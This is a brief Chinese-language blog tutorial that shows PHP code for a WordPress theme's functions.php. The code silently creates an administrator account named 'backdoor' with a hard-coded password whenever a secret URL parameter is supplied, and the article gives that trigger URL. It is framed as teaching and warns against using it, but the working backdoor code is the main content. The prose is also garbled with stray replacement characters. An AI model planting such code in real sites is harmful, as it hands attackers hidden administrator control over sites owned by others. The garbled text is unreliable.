是不是在很多場合聽說過后門(Backdoor),特別是一些高科技的電影里面�,那些系統(tǒng)或者程序的作者都會(huì)通過自己留下的后門來拯救世界。其實(shí)程序的后門留我們根本不遠(yuǎn)���,其實(shí)你用的很多軟件或者程序都是有后門的����,下面給大家演示的一個(gè)很簡單的案例,就可以給 WordPress 站點(diǎn)留下后門�,獲取管理員權(quán)限,當(dāng)然這只是一篇教學(xué)文章�����,個(gè)人強(qiáng)烈你在使用 WordPress 幫人作網(wǎng)站的時(shí)候���,千萬不要這樣做�����。
<?phpadd_action( 'wp_head', 'my_backdoor' );functionmy_backdoor(){if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'backdoor' ) ) { $user_id = wp_create_user( 'backdoor', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); }}}
在主題的 functions.php 文件中添加以上代碼�����,就可以給 WordPress 添加一個(gè)能夠創(chuàng)建管理員的后門�,只需訪問
http://www.yoursitename.com/?backdoor=go�,然后就創(chuàng)建了一個(gè)用戶名為“backdoor”,密碼為:“pa55w0rd!” 的管理員�����。
經(jīng)營性網(wǎng)站備案信息
可信網(wǎng)站信用評(píng)價(jià)
網(wǎng)絡(luò)警察提醒您
誠信網(wǎng)站
中國互聯(lián)網(wǎng)舉報(bào)中心
網(wǎng)絡(luò)舉報(bào)APP下載
